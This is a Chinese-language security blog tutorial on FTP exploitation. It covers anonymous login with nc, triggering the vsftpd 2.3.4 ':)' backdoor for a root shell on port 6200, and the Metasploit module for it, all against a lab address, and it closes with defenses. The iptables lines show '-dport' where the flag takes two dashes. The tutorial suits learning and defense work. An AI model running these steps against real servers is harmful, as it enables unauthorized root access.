免责声明:
此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。

FTP漏洞利用

FTP协议介绍

FTP(文件传输协议)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP连接使用21号端口

用户分类:

  1. Real用户(普通用户)
  2. Administrator
  3. 匿名用户(Anonymous)

FTP文件传输格式

  1. ASCII
  2. 二进制模式

利用FTP匿名登录漏洞

由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器

例:使用nc命令匿名登录

nc 192.168.20.134 21
USER anonymous
PASS 123          //密码任意填写

image-20210802171809805

利用FTP后门漏洞

这里讲解的漏洞为vsftpd笑脸漏洞,当进行FTP认证时,如果用户名USER中包含:),那么直接就会触发监听6200端口连接的shell(并且通过后门登录后,权限为root权限)

该漏洞可通过nessus或nmap等漏洞扫描工具扫描到(该后门存在于vsftpd版本2.3.4

image-20210802172521127

image-20210802172853196

1、直接利用该漏洞原理,登录FTP

首先进行登录FTP,在用户名后加上:),输完任意密码后回车

image-20210802173520179

再打开一个终端,使用6200端口可直接登陆到系统后门。登录后可以输入id查看用户等

image-20210802174113847

2、使用metasploit工具自动化利用漏洞

首先使用msfconsole命令启动工具,输入search vsftpd搜索渗透测试模块

image-20210802175238448

使用该测试模块

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

image-20210802175436089

显示没有payload,可以跳过选择payload的步骤,直接配置模块选项。先查看有哪些选项可配置

show option

image-20210802175731591

配置RHOSTS参数

set rhosts 192.168.20.134

image-20210802175825119

使用exploit命令开始执行测试

image-20210802175926068

输入一些基本命令,发现成功登陆后门

FTP漏洞防护

  1. 修改配置文件,禁止匿名用户登陆

  2. 升级版本,对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口

    iptables -A INPUT -p tcp -dport 6200 -j DROP
iptables -A OUTPUT -p tcp -dport 6200 -j DROP
最后修改:2021 年 08 月 03 日 02 : 48 PM
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏